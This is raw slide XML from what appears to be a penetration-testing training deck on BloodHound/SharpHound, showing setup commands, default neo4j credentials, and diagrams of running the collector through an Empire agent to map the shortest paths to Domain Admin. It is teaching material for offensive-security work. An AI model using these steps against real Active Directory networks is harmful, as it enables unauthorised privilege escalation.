              <a:t> and login to http://localhost:7474</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	#cd /path/to/bloodhound              (cd /opt/tools/bloodhound)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	#./bloodhound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login with: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	host: bolt://localhost:7687</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	user: neo4j  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29965842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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586B7C66-F5F4-487B-9FBC-0042D113CF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639D9E77-0DD9-4AFC-80E0-69C534B075B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26405" y="2678764"/>
            <a:ext cx="1699234" cy="1867290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C21CC1C-3CF8-42E8-8969-CBA8A2BA08AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="211325" y="4367524"/>
            <a:ext cx="2299758" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A8AD9F-B06D-49F3-9094-2B87F0EE570A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8896059" y="4179236"/>
            <a:ext cx="2011800" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Joined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F50D1A-C92B-4E43-8C30-AA4FF59AD003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2025639" y="3612409"/>
            <a:ext cx="6960442" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5970B5-810D-4A8B-A2E6-9961C27FE4C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872383" y="2426810"/>
            <a:ext cx="5637181" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Empire Agent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Any type of logon really</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A61C7A96-BB5F-4B1D-99FF-1CBF4EEE04A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986081" y="2678764"/>
            <a:ext cx="1699234" cy="1867290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Isosceles Triangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F258C4F-85B0-4467-A402-760AEA62AEF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7507047" y="934278"/>
            <a:ext cx="4657302" cy="5061005"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2FC32">
              <a:alpha val="3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Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C366F8B0-33CD-4191-8E5B-1A32E149DE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9130799" y="1380131"/>
            <a:ext cx="1554516" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some Forest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Arrow: Left 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0280F0-C73F-4AE3-8F1F-9FBA6959D84C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1064632">
            <a:off x="1862125" y="4246809"/>
            <a:ext cx="4456792" cy="135360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Bloodhound Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106932687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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586B7C66-F5F4-487B-9FBC-0042D113CF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639D9E77-0DD9-4AFC-80E0-69C534B075B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26405" y="2678764"/>
            <a:ext cx="1699234" cy="1867290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C21CC1C-3CF8-42E8-8969-CBA8A2BA08AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="211325" y="4367524"/>
            <a:ext cx="2299758" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A8AD9F-B06D-49F3-9094-2B87F0EE570A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8896059" y="4179236"/>
            <a:ext cx="2011800" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Joined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F50D1A-C92B-4E43-8C30-AA4FF59AD003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2025639" y="3612409"/>
            <a:ext cx="6960442" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5970B5-810D-4A8B-A2E6-9961C27FE4C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872383" y="2426810"/>
            <a:ext cx="5637181" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Empire Agent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Any type of logon really</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A61C7A96-BB5F-4B1D-99FF-1CBF4EEE04A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986081" y="2678764"/>
            <a:ext cx="1699234" cy="1867290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Isosceles Triangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F258C4F-85B0-4467-A402-760AEA62AEF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7507047" y="934278"/>
            <a:ext cx="4657302" cy="5061005"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2FC32">
              <a:alpha val="3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Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C366F8B0-33CD-4191-8E5B-1A32E149DE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9130799" y="1380131"/>
            <a:ext cx="1554516" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some Forest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Arrow: Right 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4D3FA6-B881-4986-9B10-E948E7002A66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20406290">
            <a:off x="4091464" y="3772649"/>
            <a:ext cx="5061561" cy="238283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Where you actually run the PSH Bloodhound script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283039211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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586B7C66-F5F4-487B-9FBC-0042D113CF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8149FFB-2DD3-4932-8CA0-060012B5A8E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330231" y="1349877"/>
            <a:ext cx="11690611" cy="4087286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Running Bloodhound will, by default, output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>three .csv files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>In the bloodhound interface, on the Kali machine, you will import these files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>You can then run queries to discover the shortest paths to Domain Admin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5029AE6B-BB43-4EF4-8063-D4A856FF6EDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912866" y="5657671"/>
            <a:ext cx="3880337" cy="1200329"/>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2400" dirty="0"/>
              <a:t>Download files in Empire:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>From the agent context:</a:t>
            </a:r>
